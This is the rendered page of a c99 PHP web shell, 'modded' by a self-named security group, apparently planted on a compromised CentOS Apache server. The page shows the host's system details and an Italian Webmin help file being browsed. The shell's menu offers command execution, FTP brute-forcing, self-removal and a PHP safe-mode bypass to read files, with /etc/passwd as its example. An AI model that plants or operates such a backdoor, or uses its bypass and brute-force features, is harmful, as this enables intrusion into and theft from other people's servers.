!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/custom/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cmd.it.html (2.79 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Ciascun comando è identificato da una descrizione (visualizzata sul pulsante nella pagina principale) e dal comando stesso da eseguire. La stringa del comando può contenere operatori di shell come |, > e ; per l'esecuzione di comandi multipli e pipeline. La stringa può anche contenere parametri come $foo, che vengono sostituiti dagli input dell'utente durante l'esecuzione del comando.

Questi parametri possono essere inseriti nella tabella che si trova nella parte bassa della pagina. Per ciascun parametro occorre inserire:

Nome
Un identificativo univoco per il parametro. Se, ad esempio, il nome del parametro è foo, la stringa $foo verrà sostituita con il valore del parametro quando il comando viene eseguito.

Descrizione
La descrizione visualizzata accanto al parametro nella pagina principale.

Tipo
Questa opzione mi permette di determinare il tipo di dato del parametro. Le opzioni disponibili sono:
  • Testo
    Permette l'inserimento libero di caratteri alfanumerici.
  • Utente
    Uno dei nomi utente configurati nel sistema.
  • UID
    Il numero UID di un utente configurato nel sistema.
  • Gruppo
    Uno dei nomi di gruppo configurati nel sistema.
  • GID
    Il numero GID di un gruppo configurato nel sistema.
  • File
    Il percorso completo al file.
  • Directory
    Il percorso completo ad una directory.
  • Opzione
    Un input di tipo SI/NO che imposterà il parametro al valore inserito nella casella di testo accanto al tipo solo se viene scelto SI.
  • Password
    Permette l'inserimento libero di caratteri alfanumerici coperti con gli asterischi (*).
  • Menu
    Un menu di opzioni lette dal file il cui nome viene specificato nella casella di testo accanto al tipo. In alternativa è possibile passare il nome del file al comando con una | alla fine, il cui output sarà usato per determinare le opzioni disponibili.
  • Upload
    Una casella di input perla selezione di un file lato client che sarà inviato al server quando il comando viene eseguito. Il file inviato verrà salvato in un file temporaneo e il percorso ad esso sarà il valore del parametro in fase di esecuzione del comando.
  • Casella di testo
    Una casella di testo a linee multiple. Quando il comando verrà eseguito ciascun carattere di nuova linea presente nel testo sarà convertito in spazi.

Comprendere il parametro tra virgolette?
Quando si sceglie SI per questa opzione il parametro sarà compreso tra virgolette ( " ) prima della sostituzione permettendo all'utente l'inserimento di valori contenenti spazi.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--